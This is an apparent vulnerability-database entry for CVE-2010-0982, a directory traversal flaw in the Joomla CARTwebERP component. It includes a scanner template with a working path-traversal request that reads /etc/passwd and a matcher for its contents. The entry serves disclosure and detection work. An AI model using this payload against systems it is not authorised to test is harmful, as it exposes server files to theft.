CVE-2010-0982: Joomla! Component com_cartweberp - Local File Inclusion

2025-08-01 Joomla! Component com_cartweberp PoC Public

Description

A directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.

PoC

id: CVE-2010-0982

info:
  name: Joomla! Component com_cartweberp - Local File Inclusion
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
  impact: |
    Allows an attacker to read arbitrary files on the server, leading to potential information disclosure and further exploitation.
  remediation: Apply all relevant security patches and product upgrades.
  reference:
    - https://www.exploit-db.com/exploits/10942
    - https://nvd.nist.gov/vuln/detail/CVE-2010-0982
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N
    cvss-score: 4.3
    cve-id: CVE-2010-0982
    cwe-id: CWE-22
    epss-score: 0.06885
    epss-percentile: 0.93725
    cpe: cpe:2.3:a:joomlamo:com_cartweberp:1.56.75:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: joomlamo
    product: com_cartweberp
  tags: cve2010,cve,joomla,lfi,edb,joomlamo,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b2e81db60ac18b94fac7ed903ca50b874563d703ffe71668b50e9f928f68160102207b76c24992f1a55fb5e1c04914e913d6735b16b7a6a4ba485b42ee10686802de:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities